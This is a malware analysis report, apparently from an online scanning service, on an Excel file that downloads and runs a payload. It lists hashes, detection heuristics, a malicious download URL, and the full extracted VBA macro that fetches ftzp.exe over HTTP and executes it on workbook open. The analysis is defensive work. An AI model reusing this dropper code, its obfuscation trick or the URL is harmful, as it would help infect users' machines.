Xls.Downloader.Sload — Office (OLE) malware analysis

Static analysis result for SHA-256 6837b198cfd6f30d…

MALICIOUS

Office (OLE)

146.2 KB Created: 2019-05-18 07:27:21 Authoring application: Microsoft Excel First seen: 2020-06-01
MD5: eb49ee744d8a05c877681c68da251720 SHA-1: ed6f03c657d380064e86be5fb9cd78e238034b97 SHA-256: 6837b198cfd6f30df59ce07c5f7267b59f0d1bef0163b4ab0136d9888dd35988
270 Risk Score

Malware Insights

Xls.Downloader.Sload · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is a malicious Excel file containing VBA macros. The 'WorkBook_open' macro triggers the execution of other VBA code that downloads a file using HTTP and saves it as 'ftzp.exe'. It then uses 'ExecuteExcel4Macro' to run the downloaded executable, indicating a downloader functionality.

Heuristics 8

  • ClamAV: Xls.Downloader.Sload-6989437-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Sload-6989437-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        .write ReplaceAll1.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ReplaceAll1 = CreateObject(UserForm1.Label1.Caption)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub WorkBook_open()
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://solsin.top/w1� Referenced by macro
    • http://ocsp.sectigo.com0Referenced by macro
    • http://ocsp.usertrust.com0Referenced by macro
    • https://sectigo.com/CPS0CReferenced by macro
    • http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sReferenced by macro
    • http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#Referenced by macro
    • http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0vReferenced by macro
    • http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2650 bytes
SHA-256: 6d2afa7c7af3e7a779017ee7b7d27fd76e6f402b56734e7eec48ae78c9da504e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_open()
UserForm2.Show



End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{295E4E6A-8698-45C9-BD3F-4859387396B7}{E65C4753-763A-4C99-AF2D-FD14FE70FF3B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub Label5_Click()
Dim ReplaceAll5
ReplaceAll1.Open Me.Label3.Caption, Me.TextBox3.Tag, False
Dim ReplaceAll6
End Sub

Public Sub S1000()

End Sub
Public Sub frfr4()

End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub Rovio()

frfr3
UserForm1.Label5_Click
ReplaceAll1.Send

With ReplaceAll2
    .Type = 1
    .Open
    .write ReplaceAll1.responseBody
End With

    ReplaceAll2.savetofile "ftzp.e" & "xe", 2
ExecuteExcel4Macro UserForm1.TextBox3.Text



ExecuteExcel4Macro "MESSAGE(True, ""dialog2"")"
End Sub

Attribute VB_Name = "Module1"
Public ReplaceAll1 As Object
 Public ReplaceAll2 As Object

Public Sub frfr3()
ExecuteExcel4Macro "MESSAGE(True, ""dialog"")"

Dim time
time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")


Set ReplaceAll1 = CreateObject(UserForm1.Label1.Caption)
Dim ReplaceAll3
Set ReplaceAll2 = CreateObject(UserForm1.Label2.Caption)
Dim ReplaceAll4


End Sub


Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{A2E52B70-A741-46CC-8E97-2A1539F80B1F}{B6AE1A4D-0876-4624-BBAF-FA01539F086D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()

    Dim c As New Class1
c.Rovio
Unload Me
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.